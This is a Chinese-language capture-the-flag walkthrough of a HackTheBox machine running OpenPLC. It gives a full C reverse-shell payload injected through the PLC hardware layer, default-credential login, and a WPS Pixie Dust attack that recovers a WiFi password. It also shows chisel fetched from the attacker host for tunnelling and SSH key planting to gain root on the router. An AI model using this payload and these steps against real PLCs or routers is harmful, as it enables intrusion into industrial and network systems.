目录
USER_FLAG:bb4486cda052880dad71c535b3fff1af
使用oneshot对路由AP进行PIN码PixieDust漏洞利用
通过FoxyPorxy插件将代理端口设置成1080,将协议切换至SOCKS5
ROOT_FLAG:e8ce76b1c0aa7b37bebc8bef041b6a93
连接至HTB服务器并启动靶机
靶机IP:10.10.11.7
分配IP:10.10.16.7
信息搜集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.11.7 -r 1-65535 --ulimit 5000
使用nmap对靶机开放端口进行脚本、服务扫描
nmap -p 22,8080 -sCV 10.10.11.7
使用curl访问靶机8080端口
curl -I http://10.10.11.7:8080
被重定向了,尝试访问重定向后的URL
curl -I http://10.10.11.7:8080/login
使用浏览器直接访问/login路径
尝试到Google搜索该WebAPP默认凭证
账户:openplc
密码:openplc
使用默认凭证成功登录到网页后台
漏洞利用
使用searchsploit搜索该WebAPP漏洞
searchsploit OpenPLC
将该EXP拷贝到当前目录下
searchsploit -m 49803.py┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 49803.py
Exploit: OpenPLC 3 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49803
Path: /usr/share/exploitdb/exploits/python/webapps/49803.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable, with very long lines (1794)
Copied to: /home/kali/Desktop/temp/49803.py
尝试利用该EXP
python 49803.py -u http://10.10.11.7:8080 -l openplc -p openplc -i 10.10.16.8 -r 1425┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python 49803.py -u http://10.10.11.7:8080 -l openplc -p openplc -i 10.10.16.8 -r 1425
[+] Remote Code Execution on OpenPLC_v3 WebServer
[+] Checking if host http://10.10.11.7:8080 is Up...
[+] Host Up! ...
[+] Trying to authenticate with credentials openplc:openplc
[x] Login failed :(
试了很多个Github上的EXP、PoC都不行,我决定手动利用该漏洞
Payload
#include "ladder.h"
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#define IP "<这里填写攻击机监听IP>"
#define PORT <这里填写攻击机监听端口>
int main()
{
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in server_addr;
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(PORT);
inet_pton(AF_INET, IP, &(server_addr.sin_addr));
connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr));
dup2(sockfd, 0);
dup2(sockfd, 1);
dup2(sockfd, 2);
execve("/bin/sh", 0, 0);
close(sockfd);
return 0;
}
左侧导航栏进入Hardware模块
首先往里写入Payload头部
将initCustomLayer函数内容进行填充
点击Save Change后回到面板
本地侧nc开始监听
nc -lvnp 1425点击左下角的Start PLC本地侧nc将收到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.7] 59548
whoami
root
提升TTY
script -c /bin/bash -q /dev/null查找user_flag位置并查看其内容
root@attica01:/opt/PLC/OpenPLC_v3/webserver# find / -name 'user.txt'
find / -name 'user.txt'
find: '/sys/kernel/debug': Permission denied
/root/user.txt
root@attica01:/opt/PLC/OpenPLC_v3/webserver# cat /root/user.txt
cat /root/user.txt
bb4486cda052880dad71c535b3fff1af
USER_FLAG:bb4486cda052880dad71c535b3fff1af
横向移动
列出所有网络接口
ifconfig
查看wlan0接口是否已链接WIFI
iw wlan0 linkroot@attica01:/proc/1# iw wlan0 link
iw wlan0 link
Not connected.
使用wlan0扫描靶机周边WIFI
iwlist wlan0 scan
扫描到WIFI:plcrouter该网络使用WPA2加密方式
对wlan0接口信息进行扫描
iw wlan0 scan
由扫描可见,该接口启用了WPS-1.0,这意味着我们可以突破本机对其他网络的访问限制
使用oneshot对路由AP进行PIN码PixieDust漏洞利用
python3 oneshot.py -i wlan0 -K
新建一个WPA配置
root@attica01:/tmp# cat << EOF > wpa.conf
cat << EOF > wpa.conf
> network={
network={
> ssid="plcrouter"
ssid="plcrouter"
> psk="NoWWEDoKnowWhaTisReal123!"
psk="NoWWEDoKnowWhaTisReal123!"
> }
}
> EOF
EOF
查看该文件内容是否正常写入
cat wpa.confroot@attica01:/tmp# cat wpa.conf
cat wpa.conf
network={
ssid="plcrouter"
psk="NoWWEDoKnowWhaTisReal123!"
}
通过该WPA配置文件进行连接
wpa_supplicant -B -i wlan0 -c wpa.confroot@attica01:/tmp# wpa_supplicant -B -i wlan0 -c wpa.conf
wpa_supplicant -B -i wlan0 -c wpa.conf
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
再次查看wlan0连接状态
iw wlan0 linkroot@attica01:/tmp# iw wlan0 link
iw wlan0 link
Connected to 02:00:00:00:01:00 (on wlan0)
SSID: plcrouter
freq: 2412
RX: 12741 bytes (181 packets)
TX: 1139 bytes (11 packets)
signal: -30 dBm
rx bitrate: 1.0 MBit/s
tx bitrate: 54.0 MBit/sbss flags: short-slot-time
dtim period: 2
beacon int: 100
查看该网口是否已分配ipv4地址
ifconfig wlan0root@attica01:/tmp# ifconfig wlan0
ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::ff:fe00:200 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 7 bytes 1223 (1.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 16 bytes 2172 (2.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
初始化DHCP池
dhclient再次查看该网口信息发现已分配ipv4地址
ifconfig wlan0root@attica01:/tmp# ifconfig wlan0
ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.84 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:200 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 14 bytes 2444 (2.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 19 bytes 3252 (3.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
AP渗透
向AP路由发送ICMP包测试连通性
ping -c 3 192.168.1.1root@attica01:/tmp# ping -c 3 192.168.1.1
ping -c 3 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=0.066 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=0.101 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=0.093 ms--- 192.168.1.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2046ms
rtt min/avg/max/mdev = 0.066/0.086/0.101/0.015 ms
攻击机通过python开启http服务
python -m http.server 6666靶机将chisel进行下载
curl -O 10.10.16.8:6666/chisel攻击机通过chisel开始反向连接
./chisel server -p 8888 --reverse靶机通过chisel客户端开始代理
./chisel client 10.10.16.8:8888 R:socks本地chiseel服务端侧收到回显
┌──(root㉿kali)-[/home/kali/Desktop/tool]
└─# ./chisel server -p 8888 --reverse
2024/11/23 05:50:59 server: Reverse tunnelling enabled
2024/11/23 05:50:59 server: Fingerprint rk0ke7Ywur1ipavVlzy3deroS9dWpE5/nI1XkuXErk8=
2024/11/23 05:50:59 server: Listening on http://0.0.0.0:8888
2024/11/23 05:56:13 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
通过FoxyPorxy插件将代理端口设置成1080,将协议切换至SOCKS5
尝试直接访问:192.168.1.1
直接空密码进入AP后台控制面板
特权提升
在System栏目下找到了Administration控制面板
此处允许我们为AP管理员添加一个SSH公钥文件
使用ssh-keygen生成密钥对
ssh-keygen┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519): ./id_rsa
Enter passphrase for "./id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa
Your public key has been saved in ./id_rsa.pub
The key fingerprint is:
SHA256:EiG4sHRbvnftfKikT8F9p9QCsWApbR5AT1ymrNSmhUU root@kali
The key's randomart image is:
+--[ED25519 256]--+
| .. oo=Eo+ |
|.... o oO*+ o |
|.o..+ .o+B.o |
|. .. ...*.. . . |
| ooSo.. + o |
| . o ...o + |
| . .oo .. |
| + + . |
| ..o. . |
+----[SHA256]-----+
查看公钥文件内容
cat id_rsa.pub ┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls
id_rsa id_rsa.pub
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICIi+RRJfHVmn5mdCvJwluUwdD1I5zYoo+qE5FpEVKoi root@kali
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICIi+RRJfHVmn5mdCvJwluUwdD1I5zYoo+qE5FpEVKoi root@kali将该公钥上传至该面板中
查看proxychains4配置端口
tail -n 5 /etc/proxychains4.conf┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# tail -n 5 /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1425
将proxychains4配置文件中的端口设置成1080
使用proxychains4代理后通过SSH服务登录到AP路由
proxychains4 ssh root@192.168.1.1 -i id_rsa
在当前目录下找到了root_flag
root@ap:~# id
uid=0(root) gid=0(root)
root@ap:~# ls
root.txt
root@ap:~# cat root.txt
e8ce76b1c0aa7b37bebc8bef041b6a93